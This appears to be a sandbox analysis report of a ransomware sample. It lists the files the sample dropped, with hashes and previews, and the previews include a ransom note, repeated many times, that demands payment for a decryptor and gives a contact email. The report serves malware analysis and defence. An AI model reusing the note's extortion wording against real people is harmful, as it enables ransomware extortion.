                                                                                            Preview:.(,?...)I..t._..)........,.B..;.wNY..m.m`..._.....&sP.._.......g......".V...d.G.d^..Olu.[LI....kA../=.N?.f..)f......@.......e\..v.vK....R/..eAZdZ....?fP.......cT......0s.....P?...'..U.V..H.Z......P&.zK..I..a.h...9Oq4......^k..A..a.&.M..&t^'...S....tQ.%fG...(.....S.......g....X:..\x..*..%..!X.r...".dO;.F..G..~..U;.Nqa..0M.`.....J.........N.k.N,.H.8.... ..#.%p....2PK.5.....=[R.!.&.e8.m....[w?.Uc...K.I3....c.B..|.B9.L.:..Lg=.....z.]..w..W.Bx..f..^S...."...-...?( ...Z.H.r.....(N;.Bz;.7...d.W0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:OpenPGP Secret Key
                                                                                            Category:dropped
                                                                                            Size (bytes):14722
                                                                                            Entropy (8bit):5.998086306448897
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:klnROY+QymwPb0lZ6mgtdHOelGdWaolvsTp:EITpwejJGxwGp
                                                                                            MD5:DADE88E6DFCD5387980B1D96E0CDEBD7
                                                                                            SHA1:1F4707477867A3E19640539378B17EB5F6A37736
                                                                                            SHA-256:8122734EA3735CA640C199E5CB687AFB6AF26D075752F988B0D29C18460A8D9B
                                                                                            SHA-512:29C88943EC27CDE83DF59A1880C7452CEB0FB6FDAB88E74BEC8DC04A4243C8FC68C07113E00980C36BEAEC9A1C7538CDD11C984B8B6AB8E4B38014221129D16D
                                                                                            Malicious:false
                                                                                            Preview:...b...ny..................+....Z.%......ww...|UP .1..I,..O....Z.w..vk...-N.}X...'.x....T..5.....3..Z..J....$V...H.. u...V...*.J].-...7.)..T.3`...#...A..+.."..YV....<nl..'.s..(....!.e.*)u...MBs....0...T.>.D...O..w.........9.FJ..?.....V....,..L.<..Q..'..u.fu...5........w|h..w.F..WF........_(...FNB&oH_.....I..t...[u5...&Y..R@B.m..y.t.BPB..)o...H.f.zsQ7.......&....N..3o...g.lz%-}..\L.X...9S<m...F.........|....n..B..;.m.a..j.4....l..R.1.>.K....p...f..+"t...V.-..D..U.....Y.T37.1..`.+E....%.|..a.{......._..y.:4.v..iQ...B........I.. O.@....M.j>...T...3.6....4.Lk.A.6.Y;..Y....g`8..i,.^.....D..\.=.b......!...S....Z$..m8.B.B.Fx.2(..a...c.d!......F...P..i.G.]....=.X.G.If...C...=......OU`~.g}.6R.....9...z .._..r.}....8.#.\{pi..G^..Q.&.....p..$.....4|mK.}.+..KMe....g$R.+...x.M...tW...:..-&qK.....s{...k.].G^CD.....T}s..vIJ.7...._.<{.^D.G.X...P.).B'..8..{O..D.T.J_....Kx....-.4.x.......'...h..p.5<A.....b6.....r....T.z6...:.yN..Z..OV....g....]...Nwn...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):302
                                                                                            Entropy (8bit):7.274389229566446
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:H3wAUV8zNYGJx092lkuxLN3NX5qYDNVzAjyBxpcFbrSECmmz2wbmfe/kPn:HAAUV8o22uNN3N7ZAj/h+JfxbmfckPn
                                                                                            MD5:2D66440CA36C6C02DA2648590D225047
                                                                                            SHA1:ABB3B95AE085C7F3DB745AEE1DA12CA431AD7171
                                                                                            SHA-256:96DB82EAB04B77525BE710BBD33D7D8A33E442BAB4B5F2A74E04DDEF9E2A0C58
                                                                                            SHA-512:909A9976DDF175F1563A02B0840FC559354B766E338E8E5F61B05462A815DFF5775D5BD6ABF0A5513E040492E77A128EF2AE22EA21005EB08966B6E638AD015C
                                                                                            Malicious:false
                                                                                            Preview:..0.4o.`z..!....# ..5"..G...H.....;h...~6.U..."]........S..)....^-.......r....9...7.,0.F.....4...r.X..4....x.......r.C...j...w-...eym.+.-.5..Fi.+..... .kx.q7".~..>.-R.cPX.....Ta......>{N.6;p.j.u...5.1.zx;.....5.N....].$#...........!.,..$.G.-.;C..d..O...G....o'...c.g....w..0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):320
                                                                                            Entropy (8bit):7.308003105888729
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:C8pQeecSmbYkwwwkJFSDHyctLbou2mm1P64+PmFsHn:CJmCwwkyDyc5nnPln
                                                                                            MD5:C66D38EF0E43059DEB5AEB006E99D528
                                                                                            SHA1:A26DEE8CA1A602799F51E109A48736634EED4208
                                                                                            SHA-256:A2178471B1845A83BC85BE5107324E97451C9A8C358B751900EC46C9482B2642
                                                                                            SHA-512:B0887DC0B2300E08E7908380BF54159111151D9FF2B447E363E47932AC47BFAF4ED4F66D4C82E655B0469E1833CCC12DCED34BFFBF277BD0FE3C30D2C57B659C
                                                                                            Malicious:false
                                                                                            Preview:.l....]Gy.......z8.(....%.|\.3..P|6gV....Sv.......P....t>SU.G@T..h.g....a.&....:...t.JiT..[B.rQ......".>d^.Bu..W.hK..7f...H..}1...do...f#...=A..MG......#.!M:./[..Q/@..Ta..s<....H.7xo._...b.4.Tl.wC.t...B...;...lk.V...D.L...3>"/..z.....f._....n......xq..EV..fB&.q".wo+..m..RI....v....G.~....u...@L0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
